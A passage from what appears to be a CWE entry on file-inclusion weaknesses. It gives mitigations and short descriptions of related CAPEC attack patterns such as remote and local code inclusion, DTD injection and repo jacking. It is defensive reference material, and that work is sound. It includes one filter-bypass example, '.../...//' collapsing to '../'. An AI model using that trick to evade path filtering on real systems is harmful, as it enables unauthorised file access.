- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-34
Strategy: Attack Surface Reduction
- Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.
- This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.
Mitigation MIT-6
Strategy: Attack Surface Reduction
- Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
- Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-175: Code Inclusion
An adversary exploits a weakness on the target to force arbitrary code to be retrieved locally or from a remote location and executed. This differs from code injection in that code injection involves the direct inclusion of code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-201: Serialized Data External Linking
An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.
CAPEC-228: DTD Injection
An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.
CAPEC-251: Local Code Inclusion
The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.
CAPEC-252: PHP Local File Inclusion
The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.
CAPEC-253: Remote Code Inclusion
The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load malicious files that the attacker placed on the remote machine, or to otherwise change the functionality of the targeted application in unexpected ways.
CAPEC-263: Force Use of Corrupted Files
This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible.
CAPEC-538: Open-Source Library Manipulation
Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.
CAPEC-549: Local Execution of Code
An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.
CAPEC-640: Inclusion of Code in Existing Process
The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, reflective code loading, and more.
CAPEC-660: Root/Jailbreak Detection Evasion via Hooking
An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to "hook" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.
CAPEC-695: Repo Jacking
An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.
CAPEC-698: Install Malicious Extension
An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.